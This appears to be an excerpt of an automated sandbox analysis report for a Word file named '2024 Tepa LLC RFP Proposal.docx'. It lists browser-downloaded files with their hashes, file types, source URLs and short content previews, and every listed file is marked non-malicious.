                                                      SHA1:AE49E56999D82802727455F0BA83B63ACD90A22B
                                                      SHA-256:C12F6098E641AACA96C60215800F18F5671039AECF812217FAB3C0D152F6ADB4
                                                      SHA-512:8C64754F77507AB2C24A6FC818419B9DD3F0CECCC9065290E41AFDBEE0743F0DA2CB13B2FBB00AFA525C082F1E697CB3FFD76EF9B902CB81D7C41CA1C641DFFB
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
                                                      Preview:/*! jQuery v1.9.1 | (c) 2005, 2012 jQuery Foundation, Inc. | jquery.org/license.//@ sourceMappingURL=jquery.min.map.*/(function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^[\],:{}\s]*$/,E=/(?:^|:|,)(?:\s*\[)+/g,S=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,A=/"[^"\\\r\n]*"|true|false|null|-?(?:\d+\.|)\d+(?:[eE][+-]?\d+|)/g,j=/^-ms-/,D=/-([\da-z])/gi,L=function(e,t){return t.toUpperCase()},H=function(e){(o.addEventListener||"load"===e.type||"complete"===o.readyState)&&(q(),b.ready())},q=function(){o.addEventListener?(o.removeEventListener("DOMContentLoaded",H,!1),e.removeEventListener("load",H,!1)):(o.detachEvent("onreadystatechange",H),e.detachEvent("onload",H)
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), TrueType, length 45496, version 1.6750
                                                      Category:downloaded
                                                      Size (bytes):45496
                                                      Entropy (8bit):7.995323366896725
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:22570E5E20F5CB69543E64F484086D9A
                                                      SHA1:2E8730B6C3F23023DC4799CC211C99C8A204668C
                                                      SHA-256:3D3431F4EA5EE22107BE19DD0C1626A031CF0253B860EB54453656276E7D8DD5
                                                      SHA-512:0A38B33045B3A071D1BAE72F48DB208FFFE218F4B05152A68824B774E70C0E17E6D126B99C5403E93DF8B18981FF05F493DE141534E864E5CDF78E2492245AB8
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://webfonts.zohowebstatic.com/texgyrecursoritalic/font.woff2
                                                      Preview:wOF2..............Ah...Y...^....................?FFTM..f..N..X.`..f........j.6.$.....t.. ..S..|[D....n;^DD.m.K~..p\...9..c.....v.3d7..)l[D......d..yI.\./}(-TUU.6a......V..3.P....8e.%{..#V.U....R.F.Fj.t.t..l.....2...M.Y].;.p........s.......gW....O..jw{.JkX"&./.W.}8...[....i..]|..3...!S....k..biSv.n....o.;::.W.....%.a.ofP.od.0..>..a....j.......H.@i..S......q.X....n..Z..g4m....G.Gu....1.P...........K......:..^....H...baev&D`.h6.a....@?.YD..tk..Z&(X..*.#2..m.#..8.A..s....ca..=]..(.]$.._+\...u...+.G.pT.n..NP5...#W.oQ,........N.1..N....F..O..}..........o?..C).......@8.#.T.....h.q.E..l....*b....j....(~{......'.<....;..(.W.E..h@S..jr.oJ..........A....k.BZ..Z..J.D".....=Q{...B.tl)v...'..o..Sd&....[.pS..2..#.._.bE.Q..{..q......|k.?VS.u.l.......j..]..:.b.R..2HS`.....` .....C.I.R...^E#zBM...._l..hI....4......t......t~M.|..G..i.Z....h.D6.!1)l....|..'...O.............g{....;..J.?.M.j.L<..(...,g[.....k.f.p.#..X..{)/.....U...v7...$.ko=..$x...V.O....P..6..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):563851
                                                      Entropy (8bit):5.221453271093944
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:12DD1E4D0485A80184B36D158018DE81
                                                      SHA1:EB2594062E90E3DCD5127679F9C369D3BF39D61C
                                                      SHA-256:A04B5B8B345E79987621008E6CC9BEF2B684663F9A820A0C7460E727A2A4DDC3
                                                      SHA-512:F3A92BF0C681E6D2198970F43B966ABDF8CCBFF3F9BD5136A1CA911747369C49F8C36C69A7E98E0F2AED3163D9D1C5D44EFCE67A178DE479196845721219E12C
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.css
                                                      Preview:@charset "UTF-8";/*! @ms-mwf/mwf - v1.25.0+6321934 | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css *
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):4.576662751096862
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:F4EDB2F05BCB2F38A8A7632ED5D0A766
                                                      SHA1:95BCD810EB16685A062F950D6B83939713EAA713
                                                      SHA-256:EF3F00CC4D68288536C35E2379B53DF378B2908A4FAE41D23A6210AB55EB8596
                                                      SHA-512:C490B11AB3AADBEDF7819E52AE0ECE34276E48BCEB794D1AFF14D90B7BE2EB7122FF88F0984F7104904560D49228EDCDA725C3B1A6093505CD1DD2DCB44789D5
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:{"code":9083,"message":"Invalid HTTP method","status":"failure"}
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (32000)
                                                      Category:downloaded
                                                      Size (bytes):4603942
                                                      Entropy (8bit):5.6748756123260575
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:91ADCEC1EAB45C3679C369DAF3BDF67F
                                                      SHA1:369673E7C92015F0ABF303215BD66FDDCB205F4A
                                                      SHA-256:81E66A9D4761EA466AE3C9DD7803283272DA1EAF59C715CB2D73CD6AA114BF60
                                                      SHA-512:6EC770510148625B5DA7C95D4E7544D59D4874BDB05F45B4F2F114EE80512828A748744A7343EC314D1E9DDE517FC2D2D656F690DA00DB16495EF216A60CFBA5
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://static.zohocdn.com/sign/assets/vendor.91adcec1eab45c3679c369daf3bdf67f.js
                                                      Preview:function createDeprecatedModule(e){define(e,["exports","ember-resolver/resolver","ember"],function(t,i,n){n.default.deprecate("Usage of `"+e+"` module is deprecated, please update to `ember-resolver`.",!1,{id:"ember-resolver.legacy-shims",until:"3.0.0"}),t.default=i.default})}function zc_templateObject240(){var e=_taggedTemplateLiteral(['<div class="ztooltip__pointer"></div>']);return zc_templateObject240=function(){return e},e}function zc_templateObject239(){var e=_taggedTemplateLiteral(['<div class="ztooltip__content">',"</div> ",""]);return zc_templateObject239=function(){return e},e}function zc_templateObject238(){var e=_taggedTemplateLiteral(["<div class=\"ztooltip\" style='display:none;'>","</div>"]);return zc_templateObject238=function(){return e},e}function zc_templateObject237(){var e=_taggedTemplateLiteral(['<span class="ztabpanel__text">',"</span>"]);return zc_templateObject237=function(){return e},e}function zc_templateObject236(){var e=_taggedTemplateLiteral([" "," "," ","
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text
                                                      Category:downloaded
                                                      Size (bytes):8510
                                                      Entropy (8bit):5.258071512610162
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:27EF99E12EB7C24712A2093A40589373
                                                      SHA1:4370A3F87EAA6C1AF01EA9981F17D55D89867718
                                                      SHA-256:9A8F18C6A5BDBC87D66155C34ACED7DC18A903BBB7E4580F1D5D2C9DC5A884C8
                                                      SHA-512:BB119D155AD47CB0A36AF6C04F0CC8C4C80F493E201CE5309B23017890CF21D5709A86B870030626C963DBDA9BDED871CEA609A5082EC900A54BA16C7D283BE4
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://static.zohocdn.com/sign/assets/sign_util.27ef99e12eb7c24712a2093a40589373.js
                                                      Preview:function getCSRFCookie().{. var csrf = getCookie("zscsrfcookie"); // No I18N. return csrf;.}.function getCookie(name).{. var init = document.cookie.indexOf(name+"=");. if(init === 0). {. init = document.cookie.indexOf(" "+name+"=")+1;. }. if (init != -1) {. var userlen = name.length;. var beginIndex = init + userlen;. var endIndex = document.cookie.indexOf(";", beginIndex);. if (endIndex == -1) {. endIndex = document.cookie.length;. }. var cVal = document.cookie.substring(beginIndex + 1, endIndex);. return cVal;. }. return null;.}..function GetURLParameter(sParam, needDecoding=false) {. var sPageURL = window.location.search.substring(1);. var sURLVariables = sPageURL.split('&');. for (var i = 0; i < sURLVariables.length; i++) {. var sParameterName = sURLVariables[i].split('=');. if (sParameterName[0] === sParam) {. //Decryption added mainly for frameOrigin. When iframe embedded sending -> sign immediately -> clicking N
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), TrueType, length 49248, version 1.0
                                                      Category:downloaded
                                                      Size (bytes):49248
                                                      Entropy (8bit):7.995197415432172
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:9531EBD4171B6ACB7DF05FE278F4E9F4
                                                      SHA1:6B3278D38226F9CDE74191590877A8AA7D2490C2
                                                      SHA-256:B0E36C4C2B20CD33BD428BE9BDC7CC680E4547AD8E94F7BBF4B68109607BCC2B
                                                      SHA-512:310B93EA9450D876774AA563BFE7F8F30B93F598A957E637B54A7845A1A315A2AEB27085280D47F1D1253B49D2CB6D0524CAEFC5E00086587821BD8BE161897A
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://webfonts.zohowebstatic.com/heuristicabolditalic/font.woff2
                                                      Preview:wOF2.......`......j.............................?FFTM...T......X.`..^.....8..o.6.$.....8.. ..v..E[G...n.. t...l...F...l..Q.2..]......u.9....,...9........%.c.X..6~.I.@P0.y4.R..vKH...V.Y.jL..F/'....Y..!a.c.+B.1.D..$U.TU.B'..Y).z@1..Mg" .b..y.B.....b.D.,F.....]R.!..F.,k..F....mqU./..B...2...*.".C:..5.t<.h....Z...~dM.*...EC..".TP.......Y{..4..t#H@y...:...|L.t..s..tZ...".....e.....;-.Eq.9.7.....+...>......-K.X........Ey...m.hM....%\.[..o.....m!...$...0...P=.R...M...G>..<....~.}....q..&%.i..4..|?.....m.FN.c.T.........Q.|...D..6F.2./H...4..."1XD.c.."....Fml#F.. ..X/...oT~.o...~......|...0..qa.YB. b'Q.e.J.N.X..LJ)e..9.. .Y1$..f!......gw..$.!......R .`5......e/.*.._.U.......K-.;..7.)....&.. ..........?Yz.t..S...D..L...D.f."....P.....o.4.7....:.....uF..N..Vq..~..fr.[KY^7..,+....y._sM..m..8..,.y...|....?.K...(............D2.L$..]...7...Q....B3....D....ES.60.x..'..F=...}Z...(j.t`.@..Fb. .....l...D.!B>.8.B..).R..n%>..R......5.bZ1...q.!&.gE...7..D.............
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PDF document, version 1.7
                                                      Category:dropped
                                                      Size (bytes):145462
                                                      Entropy (8bit):7.4286920519443616
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:11C2CAF0635176E6B0108B1CB0415D2C
                                                      SHA1:D70BF16D3794096636DACE277C6A5A60E1FCA4B1
                                                      SHA-256:823EECA3E028ED99AD1B36FAFEA04A8C94D7FC3B2D06B2B78EF2975CB08DB7DB
                                                      SHA-512:BE8A106C2A3B9440F83EAB5E283B3643286985265036895031282458B892DE17AEE9C86BAD08ECB113F4414C3DA164A2B00A4026CC1A17874FD21076E55C6968
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:%PDF-1.7.%.....157 0 obj.<</ByteRange [0 142 16528 59005 ] /ContactInfo()/Contents <30821c6006092a864886f70d010702a0821c5130821c4d020101310f300d06096086480165030402010500300b06092a864886f70d010701a08219d73082056030820348a003020102021478585f2ead2c194be3370735341328b596d46593300d06092a864886f70d01010b05003048310b300906035504061302424d31193017060355040a131051756f5661646973204c696d69746564311e301c0603550403131551756f566164697320526f6f742043412031204733301e170d3132303131323137323734345a170d3432303131323137323734345a3048310b300906035504061302424d31193017060355040a131051756f5661646973204c696d69746564311e301c0603550403131551756f566164697320526f6f74204341203120473330820222300d06092a864886f70d01010105000382020f003082020a0282020100a0be50108ee9f26c40b4049c85b931cadc2de411a9043c1b55c1e758301d24b4c3ef85de8c2ce1c13ddf82e64fad47876cec5b49c14ad5bb8fec87ac7f829a86ec3d03995201d2359eacdaf053c9663cd4ac0201da24d33ba80246afa41ce3f8735876b7f60e900db5f
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text
                                                      Category:downloaded
                                                      Size (bytes):30324
                                                      Entropy (8bit):4.9906405949672745
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:EC7BD066B09E33723D05755F854193BE
                                                      SHA1:D89C025F57322D3EF39CD4FA41EF05121C5187C7
                                                      SHA-256:9873CA3855E9DA8D6550DE681AF602DB5F1117BDC6D0870EE3E554B75CCDEBCD
                                                      SHA-512:01B61F1843BC59A71579542F9D3BFD6B5F5924484681B814AE08019397EB8617376EC2E3F99A6A9427E7ECB80C97DD597D1433F659285BEF9CB32583C8DC2E46
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://static.zohocdn.com/sign/fonts/font-styles.ec7bd066b09e33723d05755f854193be.css
                                                      Preview:@charset "UTF-8";..@font-face {. font-family: "zs-font";. src:url("fonts/zs-font.4f5c00b31f2b2c89279c409dbd5b46f6.eot");. src:url("fonts/zs-font.4f5c00b31f2b2c89279c409dbd5b46f6.eot?#iefix") format("embedded-opentype"),. url("fonts/zs-font.774f6cf073cc7d6e63e742fb6135e80b.woff") format("woff"),. url("fonts/zs-font.df775b0ef6cd3b87b8440215201dd495.svg#zs-font") format("svg");. font-weight: normal;. font-style: normal;..}.@font-face {. src: url("fonts/Pretty-Pen-Regular.9120a26d7e3ec6bfab356b5b7d1851df.ttf") format("truetype"),. url("fonts/Pretty-Pen-Regular.9a2f80432c9f402dbaa21ca199f4700a.woff") format("woff"),. url("fonts/Pretty-Pen-Regular.03d71399da1a3c7eb5c60ffb0b4f13c1.otf") format("opentype");. font-family: "PrettyPenRegular";.}..@font-face {. src: url("fonts/Sweetly-Broken.72e6c5115cb364c3e3d265179a49df63.ttf") format("truetype");. font-family: "SweetlyBroken";.}.@font-face {. src: url("fonts/Sweetly-Broken-SemiBold.e3a3c867db18ca73725b5b164fa661b2.ttf") fo
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (37592)
                                                      Category:downloaded
                                                      Size (bytes):37593
                                                      Entropy (8bit):5.094336148447065
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:F9E901FEEF6E19E1B7B4D4B2E576E2C4
                                                      SHA1:948CD73B8C07709C9CF915193F0C29786B16BC34
                                                      SHA-256:6FAEC8A6DF66D9C6BD11BFB25A050FE8705422B74B054A3F245FE2B3D80E556F
                                                      SHA-512:89F582735B3F6E5012ADBB46EBB9CEDB08F73AFBDFB436CBD9D7FC424D14EC26510D825C42F2B66D02FF39CAA11B27FCA5AA3BC81D5EBD51F50EC97572841349
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://static.zohocdn.com/sign/assets/ztopbar-min.f9e901feef6e19e1b7b4d4b2e576e2c4.css
                                                      Preview:@font-face{font-family:'Open Sans';font-style:normal;font-weight:400;src:url('//webfonts.zohowebstatic.com/opensans/font.eot');src:local('Open Sans'),url('//webfonts.zohowebstatic.com/opensans/font.eot?#iefix') format('eot'),url('//webfonts.zohowebstatic.com/opensans/font.woff2') format('woff2'),url('//webfonts.zohowebstatic.com/opensans/font.woff') format('woff'),url('//webfonts.zohowebstatic.com/opensans/font.ttf') format('truetype'),url('//webfonts.zohowebstatic.com/opensans/font.svg#OpenSans') format('svg')}@font-face{font-family:'Open Sans Semi Bold';font-style:normal;font-weight:600;src:url('//webfonts.zohowebstatic.com/opensanssemibold/font.eot');src:local('Open Sans Semi Bold'),url('//webfonts.zohowebstatic.com/opensanssemibold/font.eot?#iefix') format('eot'),url('//webfonts.zohowebstatic.com/opensanssemibold/font.woff2') format('woff2'),url('//webfonts.zohowebstatic.com/opensanssemibold/font.woff') format('woff'),url('//webfonts.zohowebstatic.com/opensanssemibold/font.ttf') fo
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text
                                                      Category:dropped
                                                      Size (bytes):1454
                                                      Entropy (8bit):5.343744863949267
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:730010E2B046F584FD4EAFED572D4656
                                                      SHA1:8B8D43E9BAED4920D9DCD3162B058BAB81C38F54
                                                      SHA-256:78D1EEBAFDE584D292EF3A77ED2BF4A07A692D124DF5D8451BD37AFA4BBF915D
                                                      SHA-512:98EEFB038A4E7B47D881D40906AFF303CAF087AF1EB897C9314EE809D5D739B3C1E4029FB9D6268E2AEE6B5320D46525960DB3EFFE57A299B2367A3A9F53857C
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:var clearTextPatternRegex = "^[\u00C0-\u024F\u2E80-\u2FD5\u3400-\u4DBF\u4E00-\u9FCC\u3000-\u303f\u3040-\u309F\u30A0-\u30FF\u31F0-\u31FF\uFF00-\uFFEF\u0400-\u04FF\u0500-\u052F0-9a-zA-Z_\\\\()\-\.\$\@\?\|\%\=\*\,\+\:\'\&\\[\\]\/\!#\n\ P{InBasicLatin}\s\n\r]+$";//No I18N.var numberPatternRegex = /^([ ]{0,})(\d{1,})([ ]{0,})$/;.var emailPatternRegex = /^(([^<>()[\]\\.,;:\s@\"]+(\.[^<>()[\]\\.,;:\s@\"]+)*)|(\".+\"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;//No I18N.function validateClearTextPattern(value){. value=value.trim(); . var patt = new RegExp(clearTextPatternRegex);. return patt.test(value);.}..function validateNumber(num){//num is a String..var number = num.match(numberPatternRegex);..if (number) {...return true;..}..return false;.}..function validateEmail(email){..if(email == null)..{...email="";//No I18N..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):152
                                                      Entropy (8bit):5.098068859515814
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:BE823D32E4B584804109CE17D89CA3F2
                                                      SHA1:211268A07050FE208F9AD788E22B40C146A7DCB4
                                                      SHA-256:C34EC5843F38E3BA841F6A8D760B5E3E2596750E471B879FFF1ABC2EADB02B71
                                                      SHA-512:30149E8CB2B6F6D1C20CF3776D87CD37A4533016DE488C3D10D7900A6F53E7232A818671F7621DEEA35D55B91690FE7E788DBCE5D6687F76AF31C4237E38328D
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSFwncjHeCus3WlRIFDZRU-s8SBQ2SBVTOEhAJyvnIT8ZCo1oSBQ1pH6n7EhAJL2tTXzu_uFUSBQ2XIwAaEh4JRxodDS9fbQYSBQ3DDU8JEgUN_A62VBIFDVz0ky0SJQnIRgSOMdSE7BIFDdO1Xn0SBQ3oSEXDEgUNMk4dzRIFDWsOKFM=?alt=proto
                                                      Preview:ChIKBw2UVPrPGgAKBw2SBVTOGgAKCQoHDWkfqfsaAAoJCgcNlyMAGhoAChsKBw3DDU8JGgAKBw38DrZUGgAKBw1c9JMtGgAKKAoHDdO1Xn0aAAoLDehIRcMaBAgHGAEKBw0yTh3NGgAKBw1rDihTGgA=
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), TrueType, length 44772, version 1.6750
                                                      Category:downloaded
                                                      Size (bytes):44772
                                                      Entropy (8bit):7.994194001976578
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:8C073758329532E952FB9A697B04A623
                                                      SHA1:D467B84807BE3F7375EDC721BEFEC603C6ED8D7D
                                                      SHA-256:4CA8D20AA2D15B79666858A1F81D0B4D8A403A293CBC45F3264C8D488064F461
                                                      SHA-512:91DB1C7695CE052CF134FF9A53EB3C99D5B57DF1B403A28F1D198A18898CD7B8EA1986539CBF1823837E3F42816B5B2901FC33DCA105F6B5AEA2D847060CE540
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://webfonts.zohowebstatic.com/texgyrecursorbold/font.woff2
                                                      Preview:wOF2.......................^....................?FFTM..f..N..X.`..f.....H....6.$.....t.. ..5..|[.u.....7...7..0..w.#.5|.".6.7.*.D.b.3q;p../Wf......d1..{...Q@-....6.P5!C.).e.I.T0..Z...%....."f.]...7..X..a....x..Rr.!.).N...3S........F7s?..>.-0.V<N.^G..J...Ns.02.d.2.....:..,.p$..'.\V.&e..# ...Xb......fRCs8Y.V...G.....OF....../.'d..F....K..:...o,.0...u.RJ..5.s..H.....T.k....cch.D:.../.]|..{..4o.Tf......j.....|....q.#.."(....?....ee.......c[...z.j.Z......jk[{..UJ.^.....g#*I....'..J.........U.O.:hmGOpc...O.=..g......c...`....7.H..8.......eQ.e:..x.8I.......Vuu..R...$".1..g_..}....=.}_..=.o........sU.g.."...$!.......<=.@.h8....n-...$;.Pj'.....M.......{..a7./...m..!1-.Y.]..3...._M.*%K...E`.......C..WW..'.gF.........v..$NX.-..e.....9,Pf...A.....9*1..f.....=+JQ..1.U......GY4..#.....E..u.....~..0..xif3........a..N|.)......c..oe..``Y.=.}....f.eP@.F>@G.+U.T...pw..6rAb}h\.A..(..).....J~....A9.\c)....O...I....:..Qw..w.... .H...s...\.^....?..^*n.H.S!.../...
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 83 x 18, 8-bit/color RGB, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):61
                                                      Entropy (8bit):4.068159130770306
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:4768F1E3A54C59801B0E952C765C29DA
                                                      SHA1:2A20EDA9085532183EA6A491BCC04C65B7AC84B4
                                                      SHA-256:2E5B783CD1A9BB14754107B54F0A3998FBDE91259857677DAF7501AA95538BD8
                                                      SHA-512:93F5A99FC31451D136DE2070B93FA6A6E20593CBEE56219EBFCE4BD2A67C4D5A478B3EA3F93DE74E05DA3CBBF3E8A853CBBDB91AE6D2BDD69B87C367D112462D
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:.PNG........IHDR...S...........u.....IDAT.....$.....IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text
                                                      Category:dropped
                                                      Size (bytes):4876
                                                      Entropy (8bit):4.835519934451927
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:9A3262979C0E18A9A0C9B060F33542F6
                                                      SHA1:5347A4AEBAE0654CD7E04BB42D3CAF4FE5A45B0E
                                                      SHA-256:AEBB58EF7448C39FF931A59180E1143DA1B37C13D6C2C3BE19F779E1F21C3D68
                                                      SHA-512:CA2605CC9F652EA2A75DEB19A81C0DEBD5972AB6D81C608D65642D8CFC33CCF4E2F8339166FA5275E0A5C3C0A538EF9AC37D2B5676B6BC7FBCCA0DD79493CF74
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:/**. * Gesture recognizer for compound multi-touch transformations.. *. * 1. pinch/zoom/scale gesture.. * 2. rotate gesture.. */..function TransformRecognizer(element) {. // Reference positions for the start of the transformation.. this.referencePair = null;. this.zoom = null;. // Bind touch event handlers to this element.. element.addEventListener('touchstart', this.touchStartHandler.bind(this));. element.addEventListener('touchmove', this.touchMoveHandler.bind(this));. element.addEventListener('touchend', this.touchEndHandler.bind(this));. this.element = element;.. // Object of callbacks this function provides.. this.callbacks = {. rotate: null,. scale: null. };.. // Define gesture states.. this.Gestures = {. NONE: 0,. ROTATE: 1,. SCALE: 2. };. // Define thresholds for gestures.. this.Thresholds = {. SCALE: 0.2, // percentage difference.. ROTATION: 5 // degrees.. };. // The current gesture of this transformation.. this.currentGesture = this.Ge
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (64241)
                                                      Category:downloaded
                                                      Size (bytes):167730
                                                      Entropy (8bit):5.045981547409661
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:AFB5C64B13342F6E568093548D0A2A9F
                                                      SHA1:95FC121CCCFDBA12443CF87A9C823486065A14AB
                                                      SHA-256:238DB52476BF8107E2E851CD3299B071ED5944B570C1603A1EA758A4FADF5F29
                                                      SHA-512:6FE8BADD1B94E81464C0808383A4CC77F779BF226A3C13B58B2BCB36332995EFBC7711373EE8AB2A8BC52675884F9885D168CB2DE9535E39E71B0B72940691E1
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://www.microsoft.com/onerfstatics/marketingsites-wcus-prod/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/2b-7ae144/7e-3283eb/69-8122fc/86-016699/72-2b1d8c/80-6461e7/2a-d9be59/51-40faf7?ver=2.0
                                                      Preview:@charset "UTF-8";./*! | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.body{margin:0}.context-uh
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), TrueType, length 65280, version 1.0
                                                      Category:downloaded
                                                      Size (bytes):65280
                                                      Entropy (8bit):7.996623502490219
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:EB94FEA880431F59FB30D1336136B36A
                                                      SHA1:80B62DFA79011F3E74D5DCB6B3683CA5D2D1D46A
                                                      SHA-256:87731C855C6B2A77CE7C26A3B327CD8B3343F3D031FD638A20076B93149C2509
                                                      SHA-512:0940DDA4C81A3B2305DA478493E35E3DA61A88DE7C7017C2FA6C4F83B70C2FC08495D505B10609835AAAE29B36A8E68432F0CE782B28E4B50FBFE0072AFAFF37
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://webfonts.zohowebstatic.com/heuristicaregular/font.woff2
                                                      Preview:wOF2..............N8............................?FFTM...~...f..d.`..F.....h....6.$..*..T.. ..@..}[.....C....D.D7.F2u.1......K<.M../...F......47..U,..s[M..U...........IE.J.....{3...#@.$....m.Mo.........'S.d...<-..<\.A..i.e..P!1ALP^.>.6....i..4.3'...bq...........l*.>..`e..xh....9>1ug.....v;-i..g.}......!&x.l.EQ.Y...LY.3V..$.$'e...F.ddd...../.8...%..........H..E.4.Lq^.m......x..p.}3.*..<.>..<..9..\...;sw..1f.i....j?.4.*.J..b.6......zl.LKd6........c.V..KS<....rL..J...|......^..w.Ws>o.8......eY..vV..p..n....C..g~U5.;$|..`.a.u....%.......H.....QV.w.iH..k...j.hCX.s{.6,...~sj......l.z3.M.E.%.......N]'T..g.....G....I...=..ya.......7....m...y....W.HUG;..}.W. 7y.K>.....k....!d)....t.. ..y....!..D4.".HI.p!.c.Z_M......f..~._.....ecm.-.2.........}K}.$M..YR*.H......t.D44E.<....Z9.....BT....S.we..h.6..k.fJ.mhu9V.H...8l../%].* .4.P...B......s.._..v<.....=...+.Q.H..-...X.E.U.3T.......PmS.....|.).cv..7...on.........WT..B.*$.X..x[N.......$.(..............d4.....
                                                      File type:Microsoft Word 2007+
                                                      Entropy (8bit):7.701322497704309
                                                      TrID:
                                                      • Word Microsoft Office Open XML Format document (49504/1) 58.23%
                                                      • Word Microsoft Office Open XML Format document (27504/1) 32.35%
                                                      • ZIP compressed archive (8000/1) 9.41%
                                                      File name:2024 Tepa LLC RFP Proposal.docx
                                                      File size:28'185 bytes
                                                      MD5:f6e7c0dcd109f8f1b7b8c84fdf180d12
                                                      SHA1:c8864f7422d5c4455e606030ba5e8f295ff2272b
                                                      SHA256:ea1e479fdb763eb2055f6ee97b9b87a950271d32561dc090758109ae6dc33ce1
                                                      SHA512:747e3425ed5a7fa394b2f5c8bb2a8c814ea04b159fcb45dfdd3a2e4b2091cf2b23980e736620bb35439d2cea8ce7ccd6f7acfffe3c4a150f4a19ea4d5395293b
                                                      SSDEEP:768:3f/bPh5Vx3Nbahu0bi+87z4jpwrsXrB5DXlfj2:n3shu0u+8EDfXlS
